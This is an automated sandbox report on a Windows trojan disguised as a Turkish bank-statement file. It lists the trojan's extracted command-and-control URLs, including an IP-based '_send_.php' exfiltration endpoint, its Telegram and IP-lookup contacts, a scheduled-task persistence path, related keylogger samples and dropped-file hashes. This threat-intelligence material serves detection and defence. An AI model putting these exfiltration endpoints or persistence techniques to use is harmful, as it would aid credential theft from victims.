https://www.ecosia.org/newtab/	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4722755873.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4722755873.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.175$	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C2A000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C6F000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.0000000003339000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.000000000337F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4722755873.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C6F000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.000000000337F000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.000000000330F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2312501128.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2365523716.0000000002861000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4722260453.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4722755873.00000000042E3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lBcq	Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.00000000034AD000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	Hesap_Hareketleri_10122024_html.exe, 00000001.00000002.2323319776.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Hesap_Hareketleri_10122024_html.exe, 0000000A.00000002.4714585363.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, UDYiGmDlq.exe, 00000010.00000002.4714892909.000000000330F000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572372
Start date and time:	2024-12-10 14:06:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Hesap_Hareketleri_10122024_html.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/15@3/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 99% Number of executed functions: 326 Number of non-executed functions: 12
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.126.53.19, 40.126.53.12, 20.190.181.2, 20.190.181.6, 20.190.181.5, 20.190.181.0, 20.190.181.4, 40.126.53.6, 13.107.246.63, 23.218.208.109, 20.109.210.53
Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target Hesap_Hareketleri_10122024_html.exe, PID 7200 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Hesap_Hareketleri_10122024_html.exe

Simulations

Behavior and APIs

Time	Type	Description
08:07:23	API Interceptor	7224447x Sleep call for process: Hesap_Hareketleri_10122024_html.exe modified
08:07:28	API Interceptor	47x Sleep call for process: powershell.exe modified
08:07:32	API Interceptor	4789069x Sleep call for process: UDYiGmDlq.exe modified
14:07:31	Task Scheduler	Run new task: UDYiGmDlq path: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	E-dekont.exe	Get hash	malicious	MassLogger RAT	Browse
	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	KrnlSetup.exe	Get hash	malicious	XWorm	Browse
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	run.cmd	Get hash	malicious	Unknown	Browse
	https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Get hash	malicious	HTMLPhisher	Browse
104.21.67.152	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Request for Quotation_10.12.2024.exe	Get hash	malicious	MassLogger RAT	Browse
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rPurchaseOrder_PO19202409.exe	Get hash	malicious	MassLogger RAT	Browse
	file.exe	Get hash	malicious	Snake Keylogger	Browse
	file.exe	Get hash	malicious	Snake Keylogger	Browse
	file.exe	Get hash	malicious	Snake Keylogger	Browse
	1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exe	Get hash	malicious	Snake Keylogger	Browse
132.226.247.73	E-dekont.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Request for Quotation New collaboration.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	Payment Details Ref#577767.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	IBAN Payment confirmation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	E-dekont.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Request for Quotation_10.12.2024.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	FATR98765678000.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
reallyfreegeoip.org	E-dekont.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	Request for Quotation_10.12.2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	FATR98765678000.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.6
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
api.telegram.org	E-dekont.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	KrnlSetup.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	149.154.167.220
	FATR98765678000.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	run.cmd	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	E-dekont.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	KrnlSetup.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	149.154.167.220
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	run.cmd	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
CLOUDFLARENETUS	E-dekont.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	tmpCA68.HtM.htm	Get hash	malicious	Unknown	Browse	104.18.25.163
	ple.bat	Get hash	malicious	Unknown	Browse	104.16.230.132
	https://github.com/greenshot/greenshot/releases/download/Greenshot-RELEASE-1.2.10.6/Greenshot-INSTALLER-1.2.10.6-RELEASE.exe	Get hash	malicious	Unknown	Browse	172.67.164.214
	https://app.droplet.io/form/yEoAzK	Get hash	malicious	Unknown	Browse	104.22.59.181
	https://app.droplet.io/form/yEoAzK	Get hash	malicious	Unknown	Browse	172.67.40.50
	https://ytfjghloadv1.b-cdn.net/proCESSINGveriffv001.html	Get hash	malicious	CAPTCHA Scam ClickFix, LummaC Stealer	Browse	104.21.80.1
	Recibos.exe	Get hash	malicious	FormBook	Browse	172.67.182.171
UTMEMUS	E-dekont.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	FATR98765678000.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	APQSKVTvd60SdAM.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	file.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	1733755327131807265395c8beb00b001ee74b7ae39a6579109a5e4a352d4399291272954e392.dat-decoded.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	E-dekont.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	https://github.com/greenshot/greenshot/releases/download/Greenshot-RELEASE-1.2.10.6/Greenshot-INSTALLER-1.2.10.6-RELEASE.exe	Get hash	malicious	Unknown	Browse	104.21.67.152
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	Request for Quotation_10.12.2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	E-dekont.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	ple.bat	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://ytfjghloadv1.b-cdn.net/proCESSINGveriffv001.html	Get hash	malicious	CAPTCHA Scam ClickFix, LummaC Stealer	Browse	149.154.167.220
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	149.154.167.220
	EEMsLiXoiTzoaDd.scr	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Client-built.exe	Get hash	malicious	Discord Rat	Browse	149.154.167.220
	KrnlSetup.exe	Get hash	malicious	XWorm	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	5.352427679901606
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
MD5:	97AD91F1C1F572C945DA12233082171D
SHA1:	D5E33DDAB37E32E416FC40419FB26B3C0563519D
SHA-256:	3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
SHA-512:	8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UDYiGmDlq.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1415
Entropy (8bit):	5.352427679901606
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
MD5:	97AD91F1C1F572C945DA12233082171D
SHA1:	D5E33DDAB37E32E416FC40419FB26B3C0563519D
SHA-256:	3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
SHA-512:	8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380192968514367
Encrypted:	false
SSDEEP:	48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:+LHyIFKL3IZ2KRH9Oug8s
MD5:	E3EC01FAB7E327602A9550342FA73464
SHA1:	7F06C78BA2496A8DDB3DDCD63BAF741CB8C84886
SHA-256:	4ECCD285FCD821659092ADB47638B559656F97512183BA76AEE2760D531273C5
SHA-512:	B66B707510DE1B0AA29F65F1C99BDEEBDC4D34EC3D9950B62E17058D2E5B1599C85A09EC056F1C4BCE019213485F1E3D7E9D68651890A853819F98DBF2492407
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5yixa5x1.liv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

